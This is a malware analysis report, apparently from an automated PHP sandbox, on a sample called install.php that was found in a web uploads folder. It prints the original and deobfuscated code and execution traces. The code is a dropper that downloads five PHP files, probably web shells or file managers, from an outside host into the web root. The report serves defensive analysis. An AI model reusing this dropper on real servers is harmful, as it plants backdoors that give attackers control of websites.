install.php

md5: d278373a0acaac5e6d83656363da4a76

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Files
copy (Deobfuscated, Original)

URLs
https://cvar1984.github.io/scripts/feed-atom.php (Deobfuscated, Original, Traces)
https://cvar1984.github.io/scripts/feed-rss.php (Deobfuscated, Original, Traces)
https://cvar1984.github.io/scripts/fm.php (Deobfuscated, Original, Traces)
https://cvar1984.github.io/scripts/mj.php (Deobfuscated, Original, Traces)
https://cvar1984.github.io/scripts/system_log.php (Deobfuscated, Original, Traces)

Deobfuscated PHP code
<?php

copy('https://cvar1984.github.io/scripts/system_log.php', "/var/www/html/system_log.php");
copy('https://cvar1984.github.io/scripts/fm.php', "/var/www/html/fm.php");
copy('https://cvar1984.github.io/scripts/mj.php', "/var/www/html/mj.php");
copy('https://cvar1984.github.io/scripts/feed-rss.php', "/var/www/html/feed-rss.php");
copy('https://cvar1984.github.io/scripts/feed-atom.php', "/var/www/html/feed-atom.php");
Execution traces
data/traces/d278373a0acaac5e6d83656363da4a76_trace-1676240506.6419.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:22:12.539727]
1	0	1	0.000200	393528
1	3	0	0.000256	395360	{main}	1		/var/www/html/uploads/install.php	0	0
2	4	0	0.000272	395360	copy	0		/var/www/html/uploads/install.php	1	2	'https://cvar1984.github.io/scripts/system_log.php'	'/var/www/html/uploads/system_log.php'
2	4	1	0.075626	398304
2	4	R			TRUE
2	5	0	0.075659	398216	copy	0		/var/www/html/uploads/install.php	2	2	'https://cvar1984.github.io/scripts/fm.php'	'/var/www/html/uploads/fm.php'
2	5	1	0.166918	398352
2	5	R			TRUE
2	6	0	0.166951	398264	copy	0		/var/www/html/uploads/install.php	3	2	'https://cvar1984.github.io/scripts/mj.php'	'/var/www/html/uploads/mj.php'
2	6	1	0.203477	398304
2	6	R			TRUE
2	7	0	0.203503	398216	copy	0		/var/www/html/uploads/install.php	4	2	'https://cvar1984.github.io/scripts/feed-rss.php'	'/var/www/html/uploads/feed-rss.php'
2	7	1	0.258300	398352
2	7	R			TRUE
2	8	0	0.258324	398264	copy	0		/var/www/html/uploads/install.php	5	2	'https://cvar1984.github.io/scripts/feed-atom.php'	'/var/www/html/uploads/feed-atom.php'
2	8	1	0.319431	398304
2	8	R			TRUE
1	3	1	0.319458	398216
			0.319491	316984
TRACE END   [2023-02-12 20:22:12.859097]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php copy('https://cvar1984.github.io/scripts/system_log.php', __DIR__ .'/system_log.php');?>
<?php copy('https://cvar1984.github.io/scripts/fm.php', __DIR__ .'/fm.php');?>
<?php copy('https://cvar1984.github.io/scripts/mj.php', __DIR__ .'/mj.php');?>
<?php copy('https://cvar1984.github.io/scripts/feed-rss.php', __DIR__ .'/feed-rss.php');?>
<?php copy('https://cvar1984.github.io/scripts/feed-atom.php', __DIR__ .'/feed-atom.php');?>

PHP Malware Analysis

install.php

md5: d278373a0acaac5e6d83656363da4a76

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code